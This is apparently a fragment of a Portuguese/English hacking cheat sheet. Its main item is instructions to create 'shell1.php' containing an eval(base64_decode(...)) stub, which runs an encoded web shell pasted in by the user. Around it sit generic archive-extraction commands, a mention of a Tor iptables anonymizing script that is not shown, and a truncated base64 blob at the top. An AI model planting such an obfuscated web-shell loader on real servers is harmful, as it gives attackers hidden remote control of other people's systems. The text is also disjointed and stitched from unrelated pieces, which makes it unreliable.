AgICAgDQovKiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAjICAgIyAgICAgICAgICAjICAg
Iw0KLyogICAgICAgI
:
:
Criando arquivo "shell1.php" e colar o codigo em base64 para dentro deste.
nano shell1.php
<?php
eval(base64_decode("cole_aqui_a_shell_em_base64_paste_in_here_encoded_shell"));
?>
ctrl + x + y
22 - zip, rar, tar.gz, bz2, tar, bz2
Descompactar arquivos
zip : gunzip nome_do_arquivo.zip ( unzip nome_do_arquivo.zip )
rar : unrar x nome_do_arquivo.rar
tar : tar -xvf nome_do_arquivo.tar
tar.gz : tar -vzxf nome_do_arquivo.tar.gz
bz2 : bunzip nome_do_arquivo.bz2
tar.bz2 : tar -jxvf nome_do_arquivo.tar.bz2
Tor Iptables script is an anonymizer that sets up iptables and tor to route all
services and traffic including DNS through the Tor network.
Please, click here to see the script and copy it.
apt-get install tor systemctl start tor apt install tor python-notify
If you want, you can add the Tor service to startup:
sudo systemctl enable tor
or
systemctl enable tor
The beginning of the script:
iptables -L
25 - Encryt x Decrypt Text
"Wisdom is like a river, the deeper it is the less noise it makes"